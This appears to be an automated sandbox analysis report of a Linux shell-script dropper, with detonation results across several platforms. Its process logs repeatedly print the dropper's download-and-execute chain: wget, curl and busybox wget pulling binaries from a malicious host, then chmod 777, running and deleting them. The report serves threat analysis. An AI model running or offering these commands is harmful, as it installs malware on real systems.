Malware Analysis Report

2025-05-28 20:52

Sample ID 241021-bt9pxstcjk
Target 80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
SHA256 80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2

Threat Level: Shows suspicious behavior

The file 80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:27

Reported

2024-10-21 01:29

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:27

Reported

2024-10-21 01:29

Platform

debian9-armhf-20240729-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:27

Reported

2024-10-21 01:30

Platform

debian9-mipsbe-20240611-en

Max time kernel

103s

Max time network

133s

Command Line

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 N/A
N/A /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB N/A
N/A /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl N/A
N/A /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J N/A
N/A /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE N/A
N/A /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj N/A
N/A /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg N/A
N/A /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 N/A
N/A /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq N/A
N/A /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 N/A
N/A /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr N/A
N/A /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ N/A
N/A /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX N/A
N/A /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 N/A
N/A /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 N/A
N/A /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj N/A
N/A /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg N/A
N/A /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 N/A
N/A /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq N/A
N/A /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr N/A
N/A /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ N/A
N/A /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX N/A
N/A /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 N/A
N/A /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE N/A
N/A /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 N/A
N/A /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB N/A
N/A /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl N/A
N/A /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /usr/bin/curl N/A
File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /usr/bin/curl N/A
File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /usr/bin/curl N/A
File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /usr/bin/curl N/A
File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /usr/bin/curl N/A
File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /usr/bin/curl N/A
File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /usr/bin/curl N/A
File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /usr/bin/curl N/A
File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /usr/bin/curl N/A
File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /usr/bin/curl N/A
File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /usr/bin/curl N/A
File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /usr/bin/curl N/A
File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /usr/bin/curl N/A
File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /usr/bin/curl N/A
File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /usr/bin/curl N/A
File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /usr/bin/curl N/A
File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /usr/bin/curl N/A
File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /usr/bin/curl N/A
File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /usr/bin/curl N/A
File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /usr/bin/curl N/A
File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /usr/bin/curl N/A
File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /usr/bin/curl N/A
File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /usr/bin/curl N/A
File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /usr/bin/curl N/A
File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /usr/bin/curl N/A
File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /usr/bin/curl N/A
File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /usr/bin/curl N/A
File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /usr/bin/curl N/A

Processes

/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/chmod

[chmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

[./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/rm

[rm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/chmod

[chmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB

[./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/rm

[rm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/chmod

[chmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl

[./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/rm

[rm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/chmod

[chmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J

[./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/rm

[rm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/chmod

[chmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE

[./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/rm

[rm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/chmod

[chmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj

[./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/rm

[rm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/chmod

[chmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg

[./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/rm

[rm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/chmod

[chmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17

[./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/rm

[rm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/chmod

[chmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq

[./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/rm

[rm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/chmod

[chmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8

[./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/rm

[rm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/chmod

[chmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr

[./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/rm

[rm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/chmod

[chmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ

[./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/rm

[rm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/chmod

[chmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX

[./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/rm

[rm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/chmod

[chmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08

[./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/rm

[rm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/chmod

[chmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8

[./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/rm

[rm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/chmod

[chmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj

[./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/rm

[rm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/chmod

[chmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg

